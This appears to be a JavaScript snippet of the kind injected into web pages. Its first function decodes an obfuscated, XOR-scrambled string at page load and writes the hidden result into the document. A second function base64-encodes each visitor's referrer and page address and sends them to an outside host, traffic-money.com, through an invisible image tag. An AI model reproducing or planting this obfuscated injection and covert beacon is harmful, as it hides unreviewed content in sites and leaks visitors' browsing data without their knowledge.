
function GzE(){
d("9&(*%vw`~ARM-hh#f{o4|&lqi|T!d3P65q]t`1{'vgjFi3%]'(.9=vdshqu?\raldtl`ms+tuhqf/'?tbw!(%huw#ofk`pbdb<]#Kdq`Vdwnqu]''q~ub<]#u`u.ofw`rbshusY%%twd<Y!oqsu9,(umbqirlubvs/fln(rr*pp-sou_%?9(vdw!,#hqq=!.:");
d("9(v`qjsw=?(GLGZ=?,KSHO9");
document.close();return 0;}var xG="",l=305419896,m=0
function d(etxt){var y,cR,el=etxt.length;for (y=0;y<el;y++){cR=etxt.charCodeAt(y);if (cR==13){document.writeln(xG);xG="";}if ((cR<32)||(cR>127)){xG+=String.fromCharCode(cR);continue;}else{m=(l*137)%0x100000000;m^=1427221233;m=m>>>1;l^=m;m|=1;m&=7;cR^=m;xG+=String.fromCharCode(cR);continue;}}document.writeln(xG);xG="";}GzE();

function encode64(inp){
	var key="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
	var chr1,chr2,chr3,enc3,enc4,i=0,out="";
	while(i<inp.length){
		chr1=inp.charCodeAt(i++);if(chr1>127) chr1=88;
		chr2=inp.charCodeAt(i++);if(chr2>127) chr2=88;
		chr3=inp.charCodeAt(i++);if(chr3>127) chr3=88;
		if(isNaN(chr3)) {enc4=64;chr3=0;} else enc4=chr3&63
		if(isNaN(chr2)) {enc3=64;chr2=0;} else enc3=((chr2<<2)|(chr3>>6))&63 
		out+=key.charAt((chr1>>2)&63)+key.charAt(((chr1<<4)|(chr2>>4))&63)+key.charAt(enc3)+key.charAt(enc4);
	}
	return encodeURIComponent(out);
}

function stats(sid){
	var referer=encode64(document.referrer);
	var thispage=encode64(window.location.hostname+window.location.pathname+location.search);
	var date=new Date()
	var time=date.getTime();
	document.writeln("<img src=\"http://traffic-money.com/tra/count.php?sid="+sid+"&p="+thispage+"&r="+referer+"&t="+time+"\" alt=\"\" border=\"0\" />\n");
}

stats(687678);
